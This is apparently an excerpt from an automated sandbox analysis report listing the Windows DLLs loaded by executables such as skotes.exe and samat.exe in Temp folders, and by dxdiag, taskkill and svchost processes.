Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Section loaded: python3.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Section loaded: libffi-8.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Section loaded: libcrypto-3.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Section loaded: libssl-3.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Section loaded: sqlite3.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Section loaded: pywintypes313.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\dxdiag.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: dxdiagn.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: d3d12.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: winmmbase.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: wmiclnt.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: winbrand.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: dsound.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: devrtl.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: spinf.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: drvstore.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: spfileq.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: wifidisplay.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: mmdevapi.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: mfplat.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: rtworkq.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: mf.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: mfcore.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: ksuser.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: mfsensorgroup.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: comppkgsup.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: windows.media.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: windows.applicationmodel.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: dispbroker.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: d3d12core.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: dxcore.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: dxilconv.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: d3dscache.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: d3d9.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: mscat32.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: d3d9.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: ddraw.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: dciman32.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: winmm.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: avrt.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: audioses.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: msacm32.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: midimap.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: winmm.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: winmm.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: dinput8.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: hid.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: winmm.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: inputhost.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: devenum.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: msdmo.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: quartz.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: d3d9.dll
Source: C:\Windows\System32\dxdiag.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wlidsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gamestreamingext.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msauserext.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: tbs.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptnet.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptngc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptprov.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: elscore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: elstrans.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
